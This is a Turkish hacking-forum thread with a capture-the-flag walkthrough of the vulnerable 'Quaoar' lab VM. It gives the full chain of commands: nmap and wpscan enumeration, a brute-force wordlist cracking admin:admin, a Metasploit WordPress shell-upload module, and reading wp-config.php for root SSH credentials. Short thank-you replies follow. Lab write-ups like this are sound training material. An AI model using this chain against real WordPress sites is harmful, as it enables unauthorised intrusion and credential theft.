Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Capture The Flag

Capture The Flag Vulnerable VM Walkthrough & Capture The Flag Writeup Yazabileceğiniz Bölüm


Quaoar :Açıklı Makine Çözümü /-The Hacker

Capture The Flag

Yeni Konu aç Cevapla
 
Seçenekler
Alt 10-02-2019 09:19   #1
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893


Quaoar :Açıklı Makine Çözümü /-The Hacker





Merhaba Arkadaşlar Bu Konuda "Quaoar VM" Açıklı Makinesinin Nasıl Çözüldüğünü Anlatıcam. Ctf Alanında İlerlemek İstiyor İseniz Yada Daha Yeni Başladıysanız Bu Konu Tam Sizler İçin Çünkü Makine Açıklamasında Bile ;



Yazmakta Ki Bencede Öyle Bu Konunun Açılma Sebebi Temel Olarak Forumdaki Yeni Başlamış Hevesli Kitleye Hitap Etmek. CTF Hakkında Daha Detaylı Bilgiye Şu Rehber Konudan Ulaşabilirsiniz.

Bölümü Güncel Olarak Takip Ederek Kendinizi Geliştirebilirsiniz. Konuya Geçelim.

Kod:
Hedef ;  Bu makinede 3 tane bayrak vardır 1. Bir kabuk alın 2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var (Gugıl İle Çevirdim Çeviri Ne Kadar Doğru Bilemem.)

Şimdi İse Çözüme Geçelim.



İlk Olarak Hedef Makinemizim İp Adresini Bulmak İçin "netdiscover" Aracını Çalıştıralım.




Hedef İp Adresini Öğrendiğimize Göre Nmap Taraması Yaparak Açık Portları Görelim.


Kod:
nmap -A -T4 192.168.1.13


Nmap Tarama Sonuçlarını İncelediyseniz Eğer Dikkatinizi Benim Gibi Robots.txt Dosyası Çekmiştir. İncelemek Üzere Curl Aracını Çalıştırıyorum.


Kod:
curl 192.168.1.13/robots.txt


Beni "/wordpress" Uzantısına Yönlendiriyor Girdiğimde İse Hiçbirşey Bulamadım Buda Beni Otomatik Olarak "/wordpress/wp-login.php" Yönlendirdi .


Login Ekranında Pek Fazla Birşey Yapamayacağım İçin "wpscan" Aracını Kullanarak Sistemdeki Açıkları ve Username'leri Bulacağız.
Kullanacağım Komut ;


Kod:
wpscan --url http://192.168.1.13/wordpress/ --enumerate u

Sonuç Olarak Bana 2 Tane Username Verdi Bende Bunları Burpsuite Üzerindne Kaba Kuvvet Saldırısında Kullanıcam.
(Burpsuite İşin Tamamen Can Sıkıntısından Kullanıldı Ki Diğer Kolay Yollarlada Şifreyi Bulabilirsiniz. Misal Hydra İlede Deneyebilirsiniz. )





Kullandığım Wordlist İse ;
Username

Kod:
admin
wpuser
Password

Kod:
password
administrator
admin
wpuser
wordpress
wpadministrator



Bu Şekilde de Sitenin Admin Giriş Bilgilerini Kaba Kuvvet Saldırısı İle Bulduk.


Kod:
admin:admin
(Anlatım Zaten Forumda Olduğu İçin Yeniden Yazma Gereği Duymadım Şu Konuda Bulabilirsiniz;https://www.turkhackteam.org/siber-g...am_hacker.html )


Şimdi İse İlk Görevi Yapalım O Zaman. "1. Bir kabuk alın" Sisteme Shell Upload Edicez Kullanıcağımız Modül


Kod:
use exploit/unix/webapp/wp_admin_shell_upload
Gerekli Bilgileri Girelim.


Kod:
set PASSWORD admin
 set USERNAME admin
set RHOST 192.168.1.13
set TARGETURI /wordpress/
run


Meterpreter Shell'imizi Aldığımızı Göre Diğer Görevler Yani "2. Kök erişimini elde edin 3. Kutuda bir yazı sonrası bayrağı var "
Bundan Sonra İse pwd ile hangi dizinde olduğumuzu öğrenip Bayrağımızı arıyoruz.




İlk Bayrağımızı Yakalamış Olduk. Kodlar;

Kod:
cd /home
cd wpadmin
ls
cat flag.txt
Sıra İkinci Bayrakta Bunun İçinde Artık /home Dizininden Çıkmak Gerekli


Kod:
cd /
Komutu ile çıkıp "ls" Komutu İle Bulunduğumuz Dizini Listeliyoruz. Dizinlerde Gezerken Yapılandırma Dosyasını Gördüm Ve Düşündüğüm Gibi;

Kod:
cd /var
ls
cd www
ls
cd wordpress
ls
cat wp-config.php
Ve Ssh Bağlantı Bilgilerimizide Almış Olduk.




Kod:
root
rootpassword!

Bağlantıyı Kurup .


Bayrağımızı Yakalayalım.
Tek Girmeniz Gereken Kod'lar


Kod:
ls 
more flag.txt
Ve 2.ci Bayrağımızıda Bulduk.




Konu Buraya Kadardı Ayrıca Bendende Buraya Kadardı 20 Saat Civarı Uyumuyordum Uykuyu Hakettiğimi Düşünüyorum Size İyi Okumalar Banada İyi Uykular

Konu THE HACKER 21 tarafından (10-02-2019 17:49 Saat 17:49 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 10-02-2019 09:29   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
09/2018
Mesajlar
Konular

Teşekkür (Etti): 453
Teşekkür (Aldı): 202




Gerçekten uğraşılmış bir konu. İyi uykular hocam



___________________________________________

Unuttuğun anıların ortasında savruldum
Ben o yuttuğum hayallerin olmadığı yerde..
Yarınlar elimizden uçup gitti..
Zaman gibi....

 Offline  
 
Alıntı ile Cevapla
Alt 11-02-2019 06:43   #3
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Alıntı:
TURKISH STARS´isimli üyeden Alıntı Mesajı göster
Gerçekten uğraşılmış bir konu. İyi uykular hocam
Teşekkürler .
 Offline  
 
Alıntı ile Cevapla
Alt 11-02-2019 08:37   #4
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
07/2015
Mesajlar
Konular

Teşekkür (Etti): 42
Teşekkür (Aldı): 17




Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?



___________________________________________

if (dev.isBored() || job.sucks()) {
searchJobs({flexibleHours: True, companyCulture: 100});

}

 Offline  
 
Alıntı ile Cevapla
Alt 11-02-2019 08:47   #5
  • Researcher
  • Üye Bilgileri
Üyelik tarihi
03/2017
Mesajlar
Konular

Teşekkür (Etti): 199
Teşekkür (Aldı): 893




Alıntı:
Daedalus´isimli üyeden Alıntı Mesajı göster
Oncelikle konu icin teşekkürler bu sekilde egitim amacli kullanabilecegimiz baska isolar varmi acaba , birde bu serinin devami gelecek mi?
Elbette https://www.vulnhub.com/ Sitesinden Kendi Bilginizi Test Amaçlı ve Kendinizi Geliştirmek İçin Diğer Makinelere Ulaşabilirsiniz. Rehber Konuyuda Okuyarak Zafiyetli Makineler Hakkında Diğer Bilgilere Ve Paylaşılan Platformlara Bakabilirsin.
https://www.turkhackteam.org/capture...m-rehberi.html
İkinci Soru İçinde https://www.turkhackteam.org/capture-flag/ Bölümünü Güncel Olarak Takip Ederseniz Zaten Bu Gibi Konuların Geldiğini Ve Geleceğinide Görürsünüz
.
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau